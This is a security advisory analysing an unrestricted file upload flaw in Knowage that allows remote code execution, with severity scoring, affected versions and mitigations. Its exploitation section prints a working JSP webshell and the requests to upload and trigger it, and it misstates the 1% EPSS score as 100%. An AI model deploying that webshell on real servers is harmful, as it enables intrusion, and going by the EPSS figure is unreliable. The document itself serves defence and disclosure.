Description
Knowage is an open source analytics and business intelligence suite. Starting in the 6.x.x branch and prior to version 8.1.8, the endpoint `/knowage/restful-services/dossier/importTemplateFile` allows authenticated users to upload `template file` on the server, but does not need any authorization to be reached. When the JSP file is uploaded, the attacker just needs to connect to `/knowageqbeengine/foo.jsp` to gain code execution on the server. By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the `knowageqbeengine` directory and gain code execution capability on the server. This issue has been patched in Knowage version 8.1.8.
EPSS Score:
1%
EUVD-2023-42479 Technical Analysis
Knowage Server Unrestricted File Upload & Remote Code Execution Vulnerability
1. VULNERABILITY ASSESSMENT AND SEVERITY EVALUATION
Severity Classification
CVSS 3.1 Base Score: 10.0 (CRITICAL)
This represents the maximum severity rating, indicating an exceptionally dangerous vulnerability requiring immediate attention.
CVSS Vector Analysis
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- Attack Vector (AV:N): Network-exploitable, requiring no physical or local access
- Attack Complexity (AC:L): Low complexity; no specialized conditions required
- Privileges Required (PR:L): Low-level authentication needed (any authenticated user)
- User Interaction (UI:N): No user interaction required for exploitation
- Scope (S:C): Changed scope - impact extends beyond the vulnerable component
- Confidentiality/Integrity/Availability (C:H/I:H/A:H): Complete compromise of all security objectives
Vulnerability Classification
- Type: CWE-434 (Unrestricted Upload of File with Dangerous Type)
- Secondary: CWE-862 (Missing Authorization)
- EPSS Score: 1.0 (100% probability of exploitation in the wild within 30 days)
Critical Assessment
This vulnerability combines two severe security flaws:
- Missing authorization controls on a sensitive file upload endpoint
- Unrestricted file type upload allowing executable JSP files
The combination enables trivial remote code execution (RCE) with minimal prerequisites, making this an extremely high-risk vulnerability.
2. POTENTIAL ATTACK VECTORS AND EXPLOITATION METHODS
Attack Chain
Phase 1: Initial Access
Attacker → Authenticate with low-privilege account → Access vulnerable endpoint
Phase 2: Exploitation
POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
Host: target-knowage-server.example.com
Content-Type: multipart/form-data
Authorization: Bearer [LOW_PRIVILEGE_TOKEN]
[Malicious JSP payload]
Phase 3: Code Execution
Access: http://target-knowage-server.example.com/knowageqbeengine/malicious.jsp
Result: Server-side code execution with application privileges
Technical Exploitation Details
Step 1: Obtain Low-Privilege Credentials
- Create legitimate user account
- Compromise existing low-privilege account
- Exploit separate authentication vulnerability
Step 2: Craft Malicious JSP Payload
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(in));
String line;
while((line = reader.readLine()) != null) {
out.println(line);
}
%>
Step 3: Upload via Vulnerable Endpoint
- Target:
/knowage/restful-services/dossier/importTemplateFile - No authorization checks performed
- File uploaded to
knowageqbeenginedirectory
Step 4: Execute Uploaded Webshell
GET /knowageqbeengine/malicious.jsp?cmd=whoami
Attack Vectors
- Direct RCE: Immediate command execution on the server
- Data Exfiltration: Access to database credentials, business intelligence data
- Lateral Movement: Pivot to internal network resources
- Persistence: Install backdoors, create additional administrative accounts
- Supply Chain Attack: Compromise BI reports distributed to stakeholders
Exploitation Complexity
Difficulty Level: LOW
- No specialized tools required
- Standard HTTP client sufficient
- Publicly documented vulnerability
- Proof-of-concept code likely available
3. AFFECTED SYSTEMS AND SOFTWARE VERSIONS
Vulnerable Versions
- Knowage Server: All versions in the 6.x.x branch through 8.1.7
- Specific Range: 6.0.0 ≤ version < 8.1.8
Affected Components
- Primary:
/knowage/restful-services/dossier/importTemplateFileendpoint - Secondary:
knowageqbeengineweb application directory - Framework: Java-based web application (JSP execution environment)
Deployment Scenarios at Risk
-
Cloud Deployments
- AWS, Azure, GCP hosted instances
- Container deployments (Docker, Kubernetes)
- SaaS implementations
-
On-Premises Installations
- Enterprise data centers
- Private cloud environments
- Hybrid cloud configurations
-
Organizational Impact
- Business Intelligence platforms
- Analytics dashboards
- Data warehousing solutions
- Executive reporting systems
European Sector Exposure
Given Knowage's prevalence in European organizations:
- Financial Services: Banking, insurance analytics
- Healthcare: Medical data analytics (GDPR-sensitive)
- Government: Public sector BI systems
- Manufacturing: Industrial analytics platforms
- Telecommunications: Network analytics
4. RECOMMENDED MITIGATION STRATEGIES
Immediate Actions (Priority 1 - Within 24 Hours)
A. Emergency Patching
# Upgrade to patched version
# Knowage 8.1.8 or later
Upgrade Path:
- Backup current installation and databases
- Review release notes for breaking changes
- Test upgrade in staging environment
- Deploy to production during maintenance window
- Verify patch effectiveness
B. Temporary Workarounds (If immediate patching impossible)
Web Application Firewall (WAF) Rules:
# Block access to vulnerable endpoint
Deny POST /knowage/restful-services/dossier/importTemplateFile
# Monitor and block JSP file uploads
Inspect multipart/form-data for .jsp extensions
Reverse Proxy Configuration (Apache/Nginx):
location /knowage/restful-services/dossier/importTemplateFile {
deny all;
return 403;
}
location ~* \.jsp$ {
if ($request_uri ~* "^/knowageqbeengine/") {
return 403;
}
}
Application-Level Controls:
<!-- web.xml security constraint -->
<security-constraint>
<web-resource-collection>
<web-resource-name>Dossier Upload</web-resource-name>
<url-pattern>/restful-services/dossier/importTemplateFile</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>ADMIN</role-name>
</auth-constraint>
</security-constraint>
Short-Term Actions (Priority 2 - Within 1 Week)
C. Access Control Hardening
-
Implement Role-Based Access Control (RBAC)
- Restrict file upload capabilities to administrative roles only
- Review and minimize user privileges
- Implement principle of least privilege
-
Authentication Strengthening
- Enable multi-factor authentication (MFA)
- Implement IP whitelisting for administrative functions
- Review and revoke unnecessary user accounts
D. Network Segmentation
[Internet] → [WAF] → [DMZ - Reverse Proxy] → [Internal Network - Knowage Server]
↓
[Isolated Database Segment]
- Isolate Knowage servers in dedicated network segments
- Implement strict firewall rules
- Monitor east-west traffic
E. Monitoring and Detection
Log Monitoring Rules:
# SIEM detection rules
Alert on:
- POST requests to /dossier/importTemplateFile
- File uploads with .jsp, .jspx, .war extensions
- New files in knowageqbeengine directory